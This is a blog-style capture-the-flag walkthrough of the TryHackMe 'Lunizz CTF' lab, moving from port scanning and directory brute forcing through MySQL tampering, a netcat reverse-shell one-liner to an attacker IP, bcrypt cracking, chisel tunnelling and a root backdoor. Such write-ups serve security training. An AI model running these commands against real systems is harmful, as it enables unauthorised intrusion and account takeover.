Lunizz CTF -TryHackMe

lunizz CTF

This is a write-up for another TryHackMe’s rooms named “Lunizz CTF”. This room is available here:

As always lets starts our enumeration process to find out what services are running on the target.



# Identify the list of services running on the target machine
⇒ sudo nmap -sS -Pn -T4 -p-

└─$ sudo nmap -sS -Pn -T4 -p- 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-02-24 16:34 EST
Nmap scan report for
Host is up (0.024s latency).
Not shown: 65530 closed ports
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
4444/tcp open krb524
5000/tcp open upnp
Nmap done: 1 IP address (1 host up) scanned in 13.41 seconds

# Perform further information gathering on the open ports identified above
⇒ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000

└─$ sudo nmap -O -A -Pn -T4 -p22,80,3306,4444,5000 130 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( ) at 2021-02-24 16:38 EST
Nmap scan report for
Host is up (0.056s latency).
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 f8:08:db:be:ed:80:d1:ef:a4:b0:a9:e8:2d:e2:dc:ee (RSA)
| 256 79:01:d6:df:8b:0a:6e:ad:b7:d8:59:9a:94:0a:09:7a (ECDSA)
|_ 256 b1:a9:ef:bb:7e:5b:01:cd:4c:8e:6b:bf:56:5d:a7:f4 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
3306/tcp open mysql MySQL 5.7.32-0ubuntu0.18.04.1
| mysql-info:
| Protocol: 10
| Version: 5.7.32-0ubuntu0.18.04.1
| Thread ID: 4
| Capabilities flags: 65535
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, LongPassword, SupportsTransactions, LongColumnFlag, IgnoreSigpipes, SwitchToSSLAfterHandshake, SupportsCompression, FoundRows, InteractiveClient, Speaks41ProtocolNew, SupportsLoadDataLocal, DontAllowDatabaseTableColumn, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: iM\x08P=\x1A "M}K^\x16jnU\x1Cv\x10]
|_ Auth Plugin Name: mysql_native_password
| ssl-cert: Subject: commonName=MySQL_Server_5.7.32_Auto_Generated_Server_Certificate
| Not valid before: 2020-12-10T19:29:01
|_Not valid after: 2030-12-08T19:29:01
|_ssl-date: TLS randomness does not represent time
4444/tcp open krb524?
| fingerprint-strings:
| GetRequest:
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| Wrong Password
| Can you decode this for me?
| cmFuZG9tcGFzc3dvcmQ=
| SSLSessionReq:
| Can you decode this for me?
|_ ZXh0cmVtZXNlY3VyZXJvb3RwYXNzd29yZA==
5000/tcp open upnp?
| fingerprint-strings:
| DNSStatusRequestTCP, FourOhFourRequest, GenericLines, Kerberos, LDAPSearchReq, NULL, NotesRPC, RPCCheck, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe, giop, oracle-tns:
| OpenSSH 5.1
|_ Unable to load config info from /usr/local/ssl/openssl.cnf
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at :
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%), Linux 3.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
1 22.04 ms
2 22.81 ms
OS and Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 16.42 seconds

Port 22 SSH version is stable and there are no know vulnerabilities. Port 80 has a web server which we will explore more in the next section. MySql is running on port 3306.Port 4444 exposes 2 password which are base64 encoded which may be used later on.Port 5000 seems to be running OpenSSH 5.1,which is a very old SSH version.We will explore it later.

Directory Brute Forcing with FFUF

We saw port 80 is open, so let’s brute force the directories and files which are exposed by this web server using ffuf:

ffuf -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c

└─$ ffuf -u -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e .html,.php,.txt -c
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
:: Method : GET
:: URL :
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Extensions : .html .php .txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
index.php [Status: 200, Size: 10917, Words: 3499, Lines: 375]
instructions.txt [Status: 200, Size: 338, Words: 39, Lines: 13]
hidden [Status: 301, Size: 313, Words: 20, Lines: 10]
whatever [Status: 301, Size: 315, Words: 20, Lines: 10]
.html [Status: 403, Size: 277, Words: 20, Lines: 10]
[Status: 200, Size: 10917, Words: 3499, Lines: 375]
.php [Status: 403, Size: 277, Words: 20, Lines: 10]
server-status [Status: 403, Size: 277, Words: 20, Lines: 10]
:: Progress: [882184/882184] :: Job [1/1] :: 475 req/sec :: Duration: [0:18:17] :: Errors: 0 ::

We saw few interesting results above.The “whatever” directory looks interesting as this indicates that we can run commands on the server,but the mode looks to be disabled:

cmd executer mode 0

What is the default password for mysql?

From the FFUF scan we saw a file named “instructions.txt”, so lets open it up in a browser:


As we can see we found a user for mysql and a corresponding default password.Lets connect to the database using this user and password:

mysql -u runcheck -h -p

connect database using mysql

And yes we can connect to the database.Let’s explore the database by running the following commands:

MySQL [(none)]> show databases;
| Database |
| information_schema |
| runornot |
2 rows in set (0.019 sec)
MySQL [(none)]> use runornot;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [runornot]> show tables;
| Tables_in_runornot |
| runcheck |
1 row in set (0.019 sec)
MySQL [runornot]> select * from runcheck;
| 0 |
1 row in set (0.028 sec)
MySQL [runornot]>

I can’t run commands, there must be a mysql column that controls command executer:

From the Table “runcheck”, we were able to find the name of the column which looks to be controlling the command executer as it’s value is 0 currently. We can update this value to 1 and check if we can exeute something.

MySQL [runornot]> UPDATE runcheck SET [REDACTED] = 1;
Query OK, 1 row affected (0.030 sec)
Rows matched: 1 Changed: 1 Warnings: 0
MySQL [runornot]> select * from runcheck;
| 1 |
1 row in set (0.018 sec)
MySQL [runornot]>

Now as the columns value is update, lets check if we can execute commands:

cmd executer mode 1

Indeed we can!

a folder shouldn’t be…

Lets execute “ls -lrt /” and we will get our answer of the above question.

Reverse Shell

From the command executer we can also get a reverse shell now.Execute the following from the executer after staring a netcat listener on your kali/attacker machine:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc KALI_IP 9999 >/tmp/f

Yes, we got the shell:

reverse shell

Upgrade Shell

Upgrade and stabilize the shell which we got by running the following commands:

/usr/bin/script -qc /bin/bash /dev/null
control+z to background
stty raw -echo
export TERM=xterm

Privilege Escalation

Transfer on to the target and run it.We can see that something is running on internal port 8080:


Also we found a directory /var/backups/.scripts that explains what is running on ports 4444 and 5000, which turns out to be rabbit holes.


Exploring the directory /proct which we found earlier and also highlighted by LinPEAS we found a python file with the following code:

www-data@lunizz:/$ cat /proct/pass/ 
import bcrypt
import base64
password = #
bpass = password.encode('ascii')
passed= str(base64.b64encode(bpass))
hashAndSalt = bcrypt.hashpw(passed.encode(), bcrypt.gensalt())
salt = b'$2b$12$SVInH5XmuS3C7eQkmqa6UOM6sDIuumJPrvuiTr.Lbz3GCcUqdf.z6'
# I wrote this code last year and i didnt save password verify line... I need to find my password

The YouTube link gives us the hint that the password can be in rockyou.txt word list and this and the code above explains that the hash is a bcrypt hash .So let’s crack it with john the ripper:

john -format=bcrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

where hash.txt contains the hash. This still didn’t cracked the password.

We will use the code given above to write a python script that will use the salt and bcrypt the passwords from rockyou.txt and compare them with the hash given(salt is actually the part of the hash which is confusingly named the variable named “salt” in the script):

This will take a lot of time to crack the password and it will fail for some passwords in rockyou.txt as they contain some special characters.It is best to remove those passwords from the list as you encounter them and remove the passwords which have already been tested till now.


From python docs , we can add an ignore handler on line 10 in the script above. This will handle the special characters automatically and there should be no need to manipulate the rockyou.txt.

hi adam, do you remember our place?

Now do switch user to “adam” using this password as the file “/proct/pass/” was owned by the user “adam”. Exploring the home directory, you will find the file which contains the password for mason:

adam@lunizz:~$ cat /home/adam/Desktop/.archive/to_my_best_friend_adam.txt 
do you remember our place
i love there it's soo calming
i will make that lights my password

Open the link and it will reveal the password.


Now switch user to the user “mason” with this new password found and we will find the user.txt on mason’s home directory:


We saw with LinPEAS that something is running on Internal port 6666. We can set up port forwarding on to our kali machine and can access this internal port. We will use chisel for port forwarding:

On Kali run chisel as server:

./chisel server -p 9000 --reverse -v

chisel as server

On Target run chisel as a client:

./chisel client R:

chisel as client

Here chisel which is running as a client will connect to the server(chisel running on kali machine on port 9000) and will ‘R’edirect the traffic from kali machine( in my case) from port 8080 to the internal port 8080 on the Target Machine.

Accessing on the kali machine, we got Mason’s Root Backdoor.:

Mason’s Root Backdoor

Intercept this request in Burp and you will notice that the request/response is send to the server using PHP and from above we need to send request with password and command type to access the backdoor. Taking example from here, request can be send to the target like this:

Let’s send the request using php from the command line using the above script:

So we need to use Mason’s password and send the request’s again with cmd type as lsla:

This worked! and the contents are the file listing of the root directory. Now this time send the request with passwd as the command type:

This changed the password of the root user. Let’s switch user to root by using this new password:

This also worked and found the root flag at /root/root.txt

That’s it.




Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

As people get older, they tend to think that they can do less and less when in reality they should…

The Remainder Operator

Jupyter Notebook Autocomplete Intellisense and Shortcuts

Easy Baking Setup with tezos-packaging

More Proof That Masks Work

Optimizing COVID-19 Vaccine Distribution Using Quantum Annealing

Kubernetes. Replication and self-healing

ESP8266 Smart Thermostat (Huzzah+ DataCake) with SMS Alerts

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store


Software Developer having keen interest in Security, Privacy and Pen-testing. Certs:- Security+,PenTest+,AZ900

More from Medium

Tryhackme: OhMyWeb Walkthrough


Tryhackme Inclusion Room

TryHackMe | Red Team Fundamentals WriteUp